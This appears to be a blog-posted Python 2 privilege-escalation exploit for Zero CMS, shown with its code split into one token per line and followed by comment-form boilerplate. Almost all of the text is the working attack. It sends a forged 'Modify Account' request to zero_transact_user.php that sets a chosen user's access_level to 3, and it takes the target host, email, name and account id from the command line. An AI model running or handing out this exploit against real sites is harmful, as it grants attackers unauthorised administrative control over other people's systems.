import
sys,getopt,cookielib,urllib2,urllib
def
exploit(host,email,name,userid):
access_level
=
3
url
=
host
+
'/zero_transact_user.php'
args
=
{
'user_id'
:userid,
'email'
:email,
'name'
:name,
'access_level'
:access_level,
'action'
:
'Modify Account'
}
data
=
urllib.urlencode(args)
cj
=
cookielib.CookieJar()
opener
=
urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
response
=
opener.
open
(url,data);
print
response.read()
def
main(argv):
host
=
''
email
=
''
accountname
=
''
userid
=
''
try
:
opts, args
=
getopt.getopt(argv,
"hu:m:n:i:"
)
except
getopt.GetoptError:
print
'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
sys.exit(
2
)
for
opt, arg
in
opts:
if
opt
=
=
'-h'
:
print
'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
sys.exit()
elif
opt
in
(
"-u"
):
host
=
arg
elif
opt
in
(
"-m"
):
email
=
arg
elif
opt
in
(
"-n"
):
accountname
=
arg
elif
opt
in
(
"-i"
):
userid
=
arg
exploit(host,email,accountname,userid)
if
__name__
=
=
"__main__"
:
main(sys.argv[
1
:])
Post a Comment
Click to see the code!
To insert emoticon you must added at least one space before the code.